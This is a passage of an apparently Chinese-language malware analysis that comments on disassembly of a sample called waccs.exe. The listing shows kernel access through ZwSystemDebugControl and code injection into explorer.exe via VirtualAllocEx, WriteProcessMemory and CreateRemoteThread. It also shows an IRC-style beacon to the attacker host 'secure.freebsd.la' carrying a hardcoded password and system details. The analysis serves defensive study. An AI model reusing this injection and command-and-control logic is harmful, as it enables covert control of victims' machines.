EDX,DWORD PTR SS:[EBP-18] 0040653C 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040653F 52 PUSH EDX 00406540 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406543 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8] 00406546 8B55 EC MOV EDX,DWORD PTR SS:[EBP-14] 00406549 8D440A 04 LEA EAX,DWORD PTR DS:[EDX+ECX+4] 0040654D 50 PUSH EAX 0040654E 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406551 8B09 MOV ECX,DWORD PTR DS:[ECX] 00406553 E8 A4F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406558 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040655B 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 0040655E 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 00406561 50 PUSH EAX 00406562 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406565 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 00406568 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040656B 52 PUSH EDX 0040656C 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 0040656F 8B08 MOV ECX,DWORD PTR DS:[EAX] 00406571 E8 86F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406576 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406579 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8] 0040657C 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040657F 52 PUSH EDX 00406580 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406583 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8] 00406586 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 00406589 8D440A 04 LEA EAX,DWORD PTR DS:[EDX+ECX+4] 0040658D 50 PUSH EAX 0040658E 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406591 8B09 MOV ECX,DWORD PTR DS:[ECX] 00406593 E8 64F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406598 EB 0C JMP SHORT waccs.004065A6 0040659A 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10] 0040659D 3B55 F4 CMP EDX,DWORD PTR SS:[EBP-C] 004065A0 ^ 0F85 15FFFFFF JNZ waccs.004064BB 004065A6 8BE5 MOV ESP,EBP 004065A8 5D POP EBP 004065A9 C2 0400 RETN 4 ; 返回. 向系统桌面程序“explorer.exe”进程内存空间中注入恶意代码,执行进程守护功能: 00405510 55 PUSH EBP 00405511 8BEC MOV EBP,ESP 00405513 81EC FC020000 SUB ESP,2FC 00405519 57 PUSH EDI 0040551A B8 D993A38B MOV EAX,8BA393D9 0040551F 50 PUSH EAX 00405520 8D8D 6CFDFFFF LEA ECX,DWORD PTR SS:[EBP-294] 00405526 E8 D5030000 CALL waccs.00405900 ; ASCII "kernel32.dll" 0040552B 50 PUSH EAX ; /pModule = "kernel32.dll" 0040552C FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA 00405532 8985 7CFDFFFF MOV DWORD PTR SS:[EBP-284],EAX 00405538 8D8D 6CFDFFFF LEA ECX,DWORD PTR SS:[EBP-294] 0040553E E8 FD020000 CALL waccs.00405840 ; 清除内存数据. 00405543 B9 C2A545F2 MOV ECX,F245A5C2 00405548 51 PUSH ECX 00405549 8D8D 60FDFFFF LEA ECX,DWORD PTR SS:[EBP-2A0] 0040554F E8 2C040000 CALL waccs.00405980 ; ASCII "CloseHandle" 00405554 50 PUSH EAX ; /ProcNameOrOrdinal = "CloseHandle" 00405555 8B95 7CFDFFFF MOV EDX,DWORD PTR SS:[EBP-284] 0040555B 52 PUSH EDX ; |hModule = 7C800000 (kernel32) 0040555C FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 00405562 8985 80FDFFFF MOV DWORD PTR SS:[EBP-280],EAX 00405568 8D8D 60FDFFFF LEA ECX,DWORD PTR SS:[EBP-2A0] 0040556E E8 9D020000 CALL waccs.00405810 ; 清除内存数据. 00405573 68 22F85E60 PUSH 605EF822 00405578 8D8D 54FDFFFF LEA ECX,DWORD PTR SS:[EBP-2AC] 0040557E E8 7D040000 CALL waccs.00405A00 ; ASCII "CreateFileA" 00405583 50 PUSH EAX ; /ProcNameOrOrdinal = "CreateFileA" 00405584 8B85 7CFDFFFF MOV EAX,DWORD PTR SS:[EBP-284] 0040558A 50 PUSH EAX ; |hModule = 7C800000 (kernel32) 0040558B FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 00405591 8985 84FDFFFF MOV DWORD PTR SS:[EBP-27C],EAX 00405597 8D8D 54FDFFFF LEA ECX,DWORD PTR SS:[EBP-2AC] 0040559D E8 6E020000 CALL waccs.00405810 ; 清除内存数据. 004055A2 68 2C150011 PUSH 1100152C 004055A7 8D8D 44FDFFFF LEA ECX,DWORD PTR SS:[EBP-2BC] 004055AD E8 CE040000 CALL waccs.00405A80 ; ASCII "CreateMutexA" 004055B2 50 PUSH EAX ; /ProcNameOrOrdinal = "CreateMutexA" 004055B3 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 004055B9 51 PUSH ECX ; |hModule = 7C800000 (kernel32) 004055BA FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 004055C0 8985 88FDFFFF MOV DWORD PTR SS:[EBP-278],EAX 004055C6 8D8D 44FDFFFF LEA ECX,DWORD PTR SS:[EBP-2BC] 004055CC E8 6F020000 CALL waccs.00405840 ; 清除内存数据. 004055D1 BA EE438A84 MOV EDX,848A43EE 004055D6 52 PUSH EDX 004055D7 8D8D 34FDFFFF LEA ECX,DWORD PTR SS:[EBP-2CC] 004055DD E8 1E050000 CALL waccs.00405B00 ; ASCII "GetLastError" 004055E2 50 PUSH EAX ; /ProcNameOrOrdinal = "GetLastError" 004055E3 8B85 7CFDFFFF MOV EAX,DWORD PTR SS:[EBP-284] 004055E9 50 PUSH EAX ; |hModule = 7C800000 (kernel32) 004055EA FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 004055F0 8985 8CFDFFFF MOV DWORD PTR SS:[EBP-274],EAX 004055F6 8D8D 34FDFFFF LEA ECX,DWORD PTR SS:[EBP-2CC] 004055FC E8 3F020000 CALL waccs.00405840 ; 清除内存数据. 00405601 68 EF642F4B PUSH 4B2F64EF 00405606 8D8D 24FDFFFF LEA ECX,DWORD PTR SS:[EBP-2DC] 0040560C E8 6F050000 CALL waccs.00405B80 ; ASCII "ReleaseMutex" 00405611 50 PUSH EAX ; /ProcNameOrOrdinal = "ReleaseMutex" 00405612 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 00405618 51 PUSH ECX ; |hModule = 7C800000 (kernel32) 00405619 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040561F 8985 90FDFFFF MOV DWORD PTR SS:[EBP-270],EAX 00405625 8D8D 24FDFFFF LEA ECX,DWORD PTR SS:[EBP-2DC] 0040562B E8 10020000 CALL waccs.00405840 ; 清除内存数据. 00405630 68 C0DE9D2B PUSH 2B9DDEC0 00405635 8D8D 1CFDFFFF LEA ECX,DWORD PTR SS:[EBP-2E4] 0040563B E8 C0050000 CALL waccs.00405C00 ; ASCII "Sleep" 00405640 50 PUSH EAX ; /ProcNameOrOrdinal = "Sleep" 00405641 8B95 7CFDFFFF MOV EDX,DWORD PTR SS:[EBP-284] 00405647 52 PUSH EDX ; |hModule = 7C800000 (kernel32) 00405648 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040564E 8985 94FDFFFF MOV DWORD PTR SS:[EBP-26C],EAX 00405654 8D8D 1CFDFFFF LEA ECX,DWORD PTR SS:[EBP-2E4] 0040565A E8 11020000 CALL waccs.00405870 ; 清除内存数据. 0040565F B8 193BE6A9 MOV EAX,A9E63B19 00405664 50 PUSH EAX 00405665 8D8D 14FDFFFF LEA ECX,DWORD PTR SS:[EBP-2EC] 0040566B E8 10060000 CALL waccs.00405C80 ; ASCII "WinExec" 00405670 50 PUSH EAX ; /ProcNameOrOrdinal = "WinExec" 00405671 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 00405677 51 PUSH ECX ; |hModule = 7C800000 (kernel32) 00405678 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040567E 8985 98FDFFFF MOV DWORD PTR SS:[EBP-268],EAX 00405684 8D8D 14FDFFFF LEA ECX,DWORD PTR SS:[EBP-2EC] 0040568A E8 11020000 CALL waccs.004058A0 ; 清除内存数据. 0040568F B9 51000000 MOV ECX,51 00405694 33C0 XOR EAX,EAX 00405696 8DBD 9CFDFFFF LEA EDI,DWORD PTR SS:[EBP-264] 0040569C F3:AB REP STOS DWORD PTR ES:[EDI] 0040569E 8D95 E8FEFFFF LEA EDX,DWORD PTR SS:[EBP-118] 004056A4 52 PUSH EDX 004056A5 6A 00 PUSH 0 004056A7 B8 E4CE3489 MOV EAX,8934CEE4 004056AC 50 PUSH EAX 004056AD 8D8D 04FDFFFF LEA ECX,DWORD PTR SS:[EBP-2FC] 004056B3 E8 48060000 CALL waccs.00405D00 ; ASCII "Shell_TrayWnd" 004056B8 50 PUSH EAX ; ASCII "Shell_TrayWnd" 004056B9 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA(寻找"Shell_TrayWnd"窗口,该窗口进程名为“explorer.exe”,是系统桌面程序). 004056BF 50 PUSH EAX 004056C0 FF15 A8814000 CALL DWORD PTR DS:[4081A8] ; USER32.GetWindowThreadProcessId(获取进程ID). 004056C6 8D8D 04FDFFFF LEA ECX,DWORD PTR SS:[EBP-2FC] 004056CC E8 FF010000 CALL waccs.004058D0 ; 清除内存数据. 004056D1 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118] 004056D7 51 PUSH ECX 004056D8 6A 00 PUSH 0 004056DA 68 FF0F1F00 PUSH 1F0FFF ; Access = PROCESS_ALL_ACCESS 004056DF FF15 48804000 CALL DWORD PTR DS:[408048] ; kernel32.OpenProcess(打开系统桌面程序“explorer.exe”进程). 004056E5 8985 E4FEFFFF MOV DWORD PTR SS:[EBP-11C],EAX 004056EB 83BD E4FEFFFF 0>CMP DWORD PTR SS:[EBP-11C],0 004056F2 75 07 JNZ SHORT waccs.004056FB 004056F4 33C0 XOR EAX,EAX 004056F6 E9 10010000 JMP waccs.0040580B ; 如果打开系统桌面程序“explorer.exe”进程失败则退出(返回)该函数. 004056FB 68 03010000 PUSH 103 00405700 8D95 F4FEFFFF LEA EDX,DWORD PTR SS:[EBP-10C] 00405706 52 PUSH EDX 00405707 6A 00 PUSH 0 00405709 FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA(获取程序自身路径名). 0040570F 68 03010000 PUSH 103 ; /maxlen = 103 (259.) 00405714 8D85 F4FEFFFF LEA EAX,DWORD PTR SS:[EBP-10C] 0040571A 50 PUSH EAX ; |src = "C:\WINDOWS\system32\waccs.exe" 0040571B 8D8D 9CFDFFFF LEA ECX,DWORD PTR SS:[EBP-264] 00405721 51 PUSH ECX ; |dest = 0012F56C 00405722 E8 75190000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00405727 83C4 0C ADD ESP,0C 0040572A 6A 3F PUSH 3F ; /maxlen = 3F (63.) 0040572C 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 0040572F 52 PUSH EDX ; |src = "t3x0" 00405730 8D85 A0FEFFFF LEA EAX,DWORD PTR SS:[EBP-160] 00405736 50 PUSH EAX ; |dest = 0012F670 00405737 E8 60190000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 0040573C 83C4 0C ADD ESP,0C 0040573F 6A 04 PUSH 4 00405741 68 00100000 PUSH 1000 00405746 68 60010000 PUSH 160 0040574B 6A 00 PUSH 0 0040574D 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] 00405753 51 PUSH ECX 00405754 FF15 4C804000 CALL DWORD PTR DS:[40804C] ; kernel32.VirtualAllocEx(在目标进程“explorer.exe”中申请内存). 0040575A 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 0040575D 8D95 F0FEFFFF LEA EDX,DWORD PTR SS:[EBP-110] 00405763 52 PUSH EDX ; /pBytesWritten = 0012F6C0 00405764 68 60010000 PUSH 160 ; |BytesToWrite = 160 (352.) 00405769 8D85 80FDFFFF LEA EAX,DWORD PTR SS:[EBP-280] 0040576F 50 PUSH EAX ; |Buffer = 0012F550 00405770 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 00405773 51 PUSH ECX ; |Address = 1460000 00405774 8B95 E4FEFFFF MOV EDX,DWORD PTR SS:[EBP-11C] 0040577A 52 PUSH EDX ; |hProcess = 000000A4 (window) 0040577B FF15 50804000 CALL DWORD PTR DS:[408050] ; kernel32.WriteProcessMemory(向目标进程“explorer.exe”内存空间中注入代码[数据段],代码数据在地址"0012F550"处,大小为0x160 "352."). 00405781 B8 0B554000 MOV EAX,waccs.0040550B 00405786 2D 60544000 SUB EAX,waccs.00405460 0040578B 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 0040578E 6A 40 PUSH 40 00405790 68 00100000 PUSH 1000 00405795 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8] 00405798 51 PUSH ECX 00405799 6A 00 PUSH 0 0040579B 8B95 E4FEFFFF MOV EDX,DWORD PTR SS:[EBP-11C] 004057A1 52 PUSH EDX 004057A2 FF15 4C804000 CALL DWORD PTR DS:[40804C] ; kernel32.VirtualAllocEx(在目标进程“explorer.exe”中申请内存). 004057A8 8985 E0FEFFFF MOV DWORD PTR SS:[EBP-120],EAX 004057AE 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110] 004057B4 50 PUSH EAX ; /pBytesWritten = 0012F6C0 004057B5 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8] 004057B8 51 PUSH ECX ; |BytesToWrite = AB (171.) 004057B9 68 60544000 PUSH waccs.00405460 ; |Buffer = waccs.00405460 004057BE 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 004057C4 52 PUSH EDX ; |Address = 1A50000 004057C5 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] 004057CB 50 PUSH EAX ; |hProcess = 000000A4 (window) 004057CC FF15 50804000 CALL DWORD PTR DS:[408050] ; kernel32.WriteProcessMemory(向目标进程“explorer.exe”内存空间中注入代码[代码段],代码数据在地址"00405460"处,大小为0xAB "171."). 004057D2 6A 00 PUSH 0 004057D4 6A 00 PUSH 0 004057D6 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 004057D9 51 PUSH ECX 004057DA 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 004057E0 52 PUSH EDX 004057E1 6A 00 PUSH 0 004057E3 6A 00 PUSH 0 004057E5 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] 004057EB 50 PUSH EAX 004057EC FF15 54804000 CALL DWORD PTR DS:[408054] ; kernel32.CreateRemoteThread(创建远程线程). 004057F2 8985 ECFEFFFF MOV DWORD PTR SS:[EBP-114],EAX 004057F8 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] 004057FE 51 PUSH ECX 004057FF FF15 58804000 CALL DWORD PTR DS:[408058] ; kernel32.CloseHandle(关闭进程句柄). 00405805 8B85 ECFEFFFF MOV EAX,DWORD PTR SS:[EBP-114] 0040580B 5F POP EDI 0040580C 8BE5 MOV ESP,EBP 0040580E 5D POP EBP 0040580F C3 RETN ; 返回. 连接骇客远程服务器"http://www.secure.freebsd.la": 004010AA 55 PUSH EBP 004010AB 8BEC MOV EBP,ESP 004010AD 83EC 24 SUB ESP,24 004010B0 6A 06 PUSH 6 ; /Family = AF_INET 004010B2 6A 01 PUSH 1 ; |Type = SOCK_STREAM 004010B4 6A 02 PUSH 2 ; |Family = AF_INET 004010B6 FF15 E0814000 CALL DWORD PTR DS:[4081E0] ; WS2_32.socket 004010BC 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 004010BF 8901 MOV DWORD PTR DS:[ECX],EAX 004010C1 6A 00 PUSH 0 ; /ShowState = SW_HIDE 004010C3 68 7833E110 PUSH 10E13378 004010C8 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24] 004010CB E8 A6100000 CALL waccs.00402176 ; ASCII "ipconfig /flushdns" 004010D0 50 PUSH EAX ; |CmdLine = "ipconfig /flushdns"(命令). 004010D1 FF15 5C804000 CALL DWORD PTR DS:[40805C] ; kernel32.WinExec(执行DOS控制台命令). 004010D7 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24] 004010DA E8 B70D0000 CALL waccs.00401E96 ; 清除内存数据. 004010DF 6A 10 PUSH 10 004010E1 6A 00 PUSH 0 004010E3 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 004010E6 50 PUSH EAX 004010E7 E8 4E5F0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 004010EC 83C4 0C ADD ESP,0C 004010EF 66:C745 F0 0200 MOV WORD PTR SS:[EBP-10],2 004010F5 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004010F8 66:8B80 8400000>MOV AX,WORD PTR DS:[EAX+84] 004010FF 50 PUSH EAX ; /NetShort = 122646 00401100 FF15 D0814000 CALL DWORD PTR DS:[4081D0] ; WS2_32.ntohs(返回一个以主机字节顺序表达的数). 00401106 66:8945 F2 MOV WORD PTR SS:[EBP-E],AX 0040110A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040110D 83C0 04 ADD EAX,4 00401110 50 PUSH EAX 00401111 E8 252B0000 CALL waccs.00403C3B ; 完成主机名到地址解析. 00401116 59 POP ECX 00401117 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 0040111A 6A 10 PUSH 10 0040111C 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 0040111F 50 PUSH EAX 00401120 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401123 FF30 PUSH DWORD PTR DS:[EAX] ; /(Socket = B4 pSockAddr = 0012F7C0 AddrLen = 10 (16.)). 00401125 FF15 CC814000 CALL DWORD PTR DS:[4081CC] ; WS2_32.connect 0040112B 83F8 FF CMP EAX,-1 0040112E 75 0F JNZ SHORT waccs.0040113F ;判断是否连通网络. 00401130 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401133 FF30 PUSH DWORD PTR DS:[EAX] 00401135 FF15 C8814000 CALL DWORD PTR DS:[4081C8] ; WS2_32.closesocket(如果连通网络,则关闭连接). 0040113B 32C0 XOR AL,AL 0040113D EB 02 JMP SHORT waccs.00401141 0040113F B0 01 MOV AL,1 00401141 C9 LEAVE 00401142 C3 RETN ; 返回. 完成主机名到地址解析: 00403C3B 55 PUSH EBP 00403C3C 8BEC MOV EBP,ESP 00403C3E 51 PUSH ECX 00403C3F 51 PUSH ECX 00403C40 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; ASCII "secure.freebsd.la" 00403C43 FF15 D4814000 CALL DWORD PTR DS:[4081D4] ; WS2_32.inet_addr 00403C49 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 00403C4C 837D FC FF CMP DWORD PTR SS:[EBP-4],-1 00403C50 75 24 JNZ SHORT waccs.00403C76 00403C52 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; /Name = "secure.freebsd.la" 00403C55 FF15 D8814000 CALL DWORD PTR DS:[4081D8] ; WS2_32.gethostbyname(完成主机名到地址解析). 00403C5B 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 00403C5E 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 00403C62 75 05 JNZ SHORT waccs.00403C69 ; 判断是否成功. 00403C64 83C8 FF OR EAX,FFFFFFFF 00403C67 EB 10 JMP SHORT waccs.00403C79 00403C69 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 00403C6C 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C] 00403C6F 8B00 MOV EAX,DWORD PTR DS:[EAX] 00403C71 8B00 MOV EAX,DWORD PTR DS:[EAX] 00403C73 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 00403C76 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00403C79 C9 LEAVE 00403C7A C3 RETN ; 返回. 查找系统中是否运行某些通讯工具(可能会利用这些通讯工具发布广告、进行自我传播以及窃取其帐号密码信息等操作),并构造发送数据包(多种包格式/与骇客远程服务器进行秘密通信): 00401143 55 PUSH EBP 00401144 8BEC MOV EBP,ESP 00401146 83EC 40 SUB ESP,40 00401149 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040114C 0FBE80 88000000 MOVSX EAX,BYTE PTR DS:[EAX+88] 00401153 85C0 TEST EAX,EAX 00401155 74 44 JE SHORT waccs.0040119B 00401157 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040115A 05 88000000 ADD EAX,88 0040115F 50 PUSH EAX 00401160 68 175FE19B PUSH 9BE15F17 00401165 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00401168 E8 69100000 CALL waccs.004021D6 ; ASCII "PASS %s" 0040116D 50 PUSH EAX 0040116E FF75 08 PUSH DWORD PTR SS:[EBP+8] 00401171 E8 8AFEFFFF CALL waccs.00401000 ; 构造发送数据包(格式:PASS %s). 00401176 83C4 0C ADD ESP,0C 00401179 0FB6C0 MOVZX EAX,AL 0040117C F7D8 NEG EAX 0040117E 1BC0 SBB EAX,EAX 00401180 40 INC EAX 00401181 8845 DC MOV BYTE PTR SS:[EBP-24],AL 00401184 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00401187 E8 4A0E0000 CALL waccs.00401FD6 ; 清除内存数据. 0040118C 0FB645 DC MOVZX EAX,BYTE PTR SS:[EBP-24] 00401190 85C0 TEST EAX,EAX 00401192 74 07 JE SHORT waccs.0040119B 00401194 32C0 XOR AL,AL 00401196 E9 8D000000 JMP waccs.00401228 ; 发送数据包失败则退出(返回). 0040119B FF75 08 PUSH DWORD PTR SS:[EBP+8] 0040119E E8 87000000 CALL waccs.0040122A ; 查找系统中是否运行某些通讯工具,并构造发送数据包(格式:NICK %s). 004011A3 59 POP ECX 004011A4 6A 11 PUSH 11 004011A6 6A 00 PUSH 0 004011A8 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 004011AB 50 PUSH EAX 004011AC E8 895E0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 004011B1 83C4 0C ADD ESP,0C 004011B4 6A 08 PUSH 8 004011B6 6A 00 PUSH 0 004011B8 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 004011BB 50 PUSH EAX 004011BC E8 795E0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 004011C1 83C4 0C ADD ESP,0C 004011C4 C745 F4 1000000>MOV DWORD PTR SS:[EBP-C],10 004011CB 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] 004011CE 50 PUSH EAX 004011CF 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 004011D2 50 PUSH EAX 004011D3 FF15 60804000 CALL DWORD PTR DS:[408060] ; kernel32.GetComputerNameA(获得机器名称). 004011D9 6A 08 PUSH 8 004011DB 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 004011DE 50 PUSH EAX 004011DF E8 972A0000 CALL waccs.00403C7B ; 获取计算机系统版本号"%s-SP%d". 004011E4 59 POP ECX 004011E5 59 POP ECX 004011E6 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 004011E9 50 PUSH EAX 004011EA 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 004011ED 50 PUSH EAX 004011EE 68 D1F1AD0C PUSH 0CADF1D1 004011F3 8D4D C0 LEA ECX,DWORD PTR SS:[EBP-40] 004011F6 E8 3B100000 CALL waccs.00402236 ; ASCII "USER %s x x :%s" 004011FB 50 PUSH EAX 004011FC FF75 08 PUSH DWORD PTR SS:[EBP+8] 004011FF E8 FCFDFFFF CALL waccs.00401000 ; 并构造发送数据包(格式:USER %s x x :%s). 00401204 83C4 10 ADD ESP,10 00401207 0FB6C0 MOVZX EAX,AL 0040120A F7D8 NEG EAX 0040120C 1BC0 SBB EAX,EAX 0040120E 40 INC EAX 0040120F 8845 D0 MOV BYTE PTR SS:[EBP-30],AL 00401212 8D4D C0 LEA ECX,DWORD PTR SS:[EBP-40] 00401215 E8 1C0D0000 CALL waccs.00401F36 ; 清除内存数据. 0040121A 0FB645 D0 MOVZX EAX,BYTE PTR SS:[EBP-30] 0040121E 85C0 TEST EAX,EAX 00401220 74 04 JE SHORT waccs.00401226 00401222 32C0 XOR AL,AL 00401224 EB 02 JMP SHORT waccs.00401228 00401226 B0 01 MOV AL,1 00401228 C9 LEAVE 00401229 C3 RETN ; 返回. 构造发送数据包(格式:PASS %s): 00401000 55 PUSH EBP 00401001 8BEC MOV EBP,ESP 00401003 81EC 08040000 SUB ESP,408 00401009 68 00040000 PUSH 400 0040100E 6A 00 PUSH 0 00401010 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401016 50 PUSH EAX 00401017 E8 1E600000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 0040101C 83C4 0C ADD ESP,0C 0040101F 8D45 10 LEA EAX,DWORD PTR SS:[EBP+10] 00401022 8985 FCFBFFFF MOV DWORD PTR SS:[EBP-404],EAX 00401028 FFB5 FCFBFFFF PUSH DWORD PTR SS:[EBP-404] ; /arglist = 0012F784 0040102E FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |format = "PASS %s" 00401031 68 00040000 PUSH 400 ; |count = 400 (1024.) 00401036 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 0040103C 50 PUSH EAX ; |buffer = 0012F374 0040103D E8 F25F0000 CALL waccs.00407034 ; JMP 到 msvcrt._vsnprintf 00401042 83C4 10 ADD ESP,10 00401045 83A5 FCFBFFFF 0>AND DWORD PTR SS:[EBP-404],0 0040104C 68 00040000 PUSH 400 ; /maxlen = 400 (1024.) 00401051 68 246752BF PUSH BF526724 00401056 8D8D F8FBFFFF LEA ECX,DWORD PTR SS:[EBP-408] 0040105C E8 B5100000 CALL waccs.00402116 ; ASCII "\n" 00401061 50 PUSH EAX ; |src = "\n" 00401062 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401068 50 PUSH EAX ; |dest = "PASS su1c1d3" 00401069 E8 C05F0000 CALL waccs.0040702E ; JMP 到 msvcrt.strncat 0040106E 83C4 0C ADD ESP,0C 00401071 8D8D F8FBFFFF LEA ECX,DWORD PTR SS:[EBP-408] 00401077 E8 820F0000 CALL waccs.00401FFE ; 清除内存数据. 0040107C 6A 00 PUSH 0 ; /Flags = 0 0040107E 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401084 50 PUSH EAX ; /s = "PASS su1c1d3\n" 00401085 E8 9E5F0000 CALL waccs.00407028 ; JMP 到 msvcrt.strlen 0040108A 59 POP ECX 0040108B 50 PUSH EAX ; |DataSize = E (14.) 0040108C 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401092 50 PUSH EAX ; |Data = 0012F374 00401093 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401096 FF30 PUSH DWORD PTR DS:[EAX] ; |Socket = B4 00401098 FF15 C4814000 CALL DWORD PTR DS:[4081C4] ; WS2_32.send 0040109E 85C0 TEST EAX,EAX 004010A0 7E 04 JLE SHORT waccs.004010A6 004010A2 B0 01 MOV AL,1 004010A4 EB 02 JMP SHORT waccs.004010A8 004010A6 32C0 XOR AL,AL 004010A8 C9 LEAVE 004010A9 C3 RETN ; 返回. 查找系统中是否运行某些通讯工具,并构造发送数据包(格式:NICK %s): 0040122A 55 PUSH EBP 0040122B 8BEC MOV EBP,ESP 0040122D 81EC 08010000 SUB ESP,108 00401233 56 PUSH ESI 00401234 57 PUSH EDI 00401235 6A 09 PUSH 9 00401237 59 POP ECX 00401238 BE 30904000 MOV ESI,waccs.00409030 ; ASCII "abcdefghijklmnopqrstuvwxyz1234567890" 0040123D 8D7D B4 LEA EDI,DWORD PTR SS:[EBP-4C] 00401240 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 00401242 A4 MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] 00401243 6A 04 PUSH 4 00401245 6A 00 PUSH 0 00401247 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 0040124A 50 PUSH EAX 0040124B E8 EA5D0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401250 83C4 0C ADD ESP,0C 00401253 6A 19 PUSH 19 00401255 6A 00 PUSH 0 00401257 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 0040125A 50 PUSH EAX 0040125B E8 DA5D0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401260 83C4 0C ADD ESP,0C 00401263 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00401269 50 PUSH EAX 0040126A E8 DD5D0000 CALL waccs.0040704C ; JMP 到 msvcrt.srand(生成随机数). 0040126F 59 POP ECX 00401270 8365 DC 00 AND DWORD PTR SS:[EBP-24],0 00401274 EB 07 JMP SHORT waccs.0040127D 00401276 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24] 00401279 40 INC EAX 0040127A 8945 DC MOV DWORD PTR 